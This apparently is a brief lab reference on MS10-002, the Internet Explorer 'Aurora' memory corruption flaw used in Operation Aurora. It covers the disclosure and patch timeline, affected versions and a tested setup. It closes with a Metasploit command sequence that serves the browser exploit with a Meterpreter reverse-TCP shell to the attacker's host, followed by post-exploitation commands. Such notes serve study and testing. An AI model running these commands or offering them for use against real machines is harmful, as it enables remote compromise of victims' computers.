MS10-002 : Internet Explorer Aurora Memory Corruption
Timeline :
Microsoft learned of the vulnerability on 2010-01-13
Metasploit PoC provided by hdm on 2010-01-15
Exploit-DB PoC provided by Ahmed Obied on 2010-01-17
Microsoft patch "KB978207" provided on 2010-01-21
PoC provided by :
unknown
hdm
Reference(s) :
Affected version(s) :
Internet Explorer 5
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Tested on Windows XP SP3 with :
Internet Explorer 6 before KB978207
Description :
This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the Operation Aurora attacks that led to the compromise of a number of high-profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample; as such, only Internet Explorer 6 can be reliably exploited.
Commands :
use exploit/windows/browser/ms10_002_aurora
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1
sysinfo
getuid
ipconfig